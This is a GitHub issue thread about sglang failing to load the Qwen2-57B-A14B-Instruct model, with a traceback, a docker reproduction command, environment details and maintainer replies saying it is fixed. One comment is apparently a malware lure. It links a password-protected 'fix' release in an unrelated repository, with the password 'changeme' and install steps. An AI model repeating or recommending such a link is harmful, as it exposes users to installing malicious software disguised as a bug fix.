### ISSUE TITLE
[Bug] Error in loading Qwen2-57B-A14B-Instruct

### ISSUE THREAD

**Issue by LucienShui** [sgl-project/sglang#1251]
### Checklist

- [X] 1. I have searched related issues but cannot get the expected help.
- [X] 2. The bug has not been fixed in the latest version.
- [X] 3. Please note that if the bug-related issue you submitted lacks corresponding environment info and a minimal reproducible demo, it will be challenging for us to reproduce and resolve the issue, reducing the likelihood of receiving feedback.
- [X] 4. If the issue you raised is not a bug but a question, please raise a discussion at https://github.com/sgl-project/sglang/discussions/new/choose Otherwise, it will be closed.
- [X] 5. Please use English, otherwise it will be closed.

### Describe the bug

When serving `Qwen2-57B-A14B-Instruct` with latest docker image `lmsysorg/sglang:v0.2.14.post1-cu121`, there would be an error, but `lmsysorg/sglang:v0.2.11-cu124` worked well.

```plain
Process Process-1:1:
[23:31:19 TP2] Exception in run_tp_server:
Traceback (most recent call last):
  File "/sgl-workspace/sglang/python/sglang/srt/managers/tp_worker.py", line 874, in run_tp_server
    model_server = ModelTpServer(
  File "/sgl-workspace/sglang/python/sglang/srt/managers/tp_worker.py", line 99, in __init__
    self.model_runner = ModelRunner(
  File "/sgl-workspace/sglang/python/sglang/srt/model_executor/model_runner.py", line 99, in __init__
    self.load_model()
  File "/sgl-workspace/sglang/python/sglang/srt/model_executor/model_runner.py", line 192, in load_model
    self.model = get_model(
  File "/usr/local/lib/python3.10/dist-packages/vllm/model_executor/model_loader/__init__.py", line 19, in get_model
    return loader.load_model(model_config=model_config,
  File "/usr/local/lib/python3.10/dist-packages/vllm/model_executor/model_loader/loader.py", line 344, in load_model
    model.load_weights(
  File "/sgl-workspace/sglang/python/sglang/srt/models/qwen2_moe.py", line 458, in load_weights
    weight_loader(
  File "/usr/local/lib/python3.10/dist-packages/vllm/model_executor/layers/fused_moe/layer.py", line 206, in weight_loader
    raise ValueError(f"shard_id must be ['w1','w2','w3'] but "
ValueError: shard_id must be ['w1','w2','w3'] but got 1.
```

### Reproduction

```shell
docker run --rm -it --ipc host --gpus '"device=0,1,2,3"' -v /path/to/Qwen2-57B-A14B-Instruct:/model:ro -p 8000:8000 \
  lmsysorg/sglang:v0.2.14.post1-cu121 \
  python3 -m sglang.launch_server \
    --model-path /model \
    --host 0.0.0.0 \
    --port 8000 \
    --tp-size 4 \
    --enable-p2p-check
```

### Environment

```plain
Python: 3.10.14 (main, Apr  6 2024, 18:45:05) [GCC 9.4.0]
CUDA available: True
GPU 0,1,2,3: NVIDIA A100-PCIE-40GB
GPU 0,1,2,3 Compute Capability: 8.0
CUDA_HOME: /usr/local/cuda
NVCC: Cuda compilation tools, release 12.1, V12.1.105
CUDA Driver Version: 550.67
PyTorch: 2.4.0+cu121
flashinfer: 0.1.6+cu121torch2.4
triton: 3.0.0
transformers: 4.44.2
requests: 2.32.3
tqdm: 4.66.5
numpy: 1.26.4
aiohttp: 3.10.5
fastapi: 0.112.2
hf_transfer: 0.1.8
huggingface_hub: 0.24.6
interegular: 0.3.3
packaging: 24.1
PIL: 10.4.0
psutil: 6.0.0
pydantic: 2.8.2
uvicorn: 0.30.6
uvloop: 0.20.0
zmq: 26.2.0
vllm: 0.5.5
multipart: 0.0.9
openai: 1.42.0
anthropic: 0.34.1
NVIDIA Topology: 
	GPU0	GPU1	GPU2	GPU3	CPU Affinity	NUMA Affinity	GPU NUMA ID
GPU0	 X 	PHB	PHB	PHB	0-79	0-1		N/A
GPU1	PHB	 X 	PHB	PHB	0-79	0-1		N/A
GPU2	PHB	PHB	 X 	PHB	0-79	0-1		N/A
GPU3	PHB	PHB	PHB	 X 	0-79	0-1		N/A

Legend:

  X    = Self
  SYS  = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)
  NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node
  PHB  = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)
  PXB  = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)
  PIX  = Connection traversing at most a single PCIe bridge
  NV#  = Connection traversing a bonded set of # NVLinks

ulimit soft: 1048576
```

**Comment by zhyncs** [comment]
Thanks for reporting this issue. I'll take a look.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by merrymercy** [comment]
fixed by #1252
